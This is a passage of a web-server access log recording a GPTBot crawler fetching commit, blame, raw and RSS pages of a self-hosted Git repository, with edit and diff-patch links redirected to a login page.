"https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:17:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 9846] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" -[17/Feb/2026:17:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10302] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" -[17/Feb/2026:17:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" -[17/Feb/2026:17:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9790] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 11608] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 9780] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 212324] [Gzip 17.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 9781] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:17:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12339] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 9782] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 21208] [Gzip 10.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21193] [Gzip 10.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10276] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 11134] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:06:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:06:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:06:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:06:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:06:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:06:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:06:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 11115] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" -[17/Feb/2026:17:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 31682] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" -[17/Feb/2026:17:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:17:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 11706] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 215878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 436304] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" -[17/Feb/2026:17:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 16196] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 1949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:17:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 1984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 3799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:07:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:07:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 860] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" -[17/Feb/2026:17:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:17:07:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:07:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 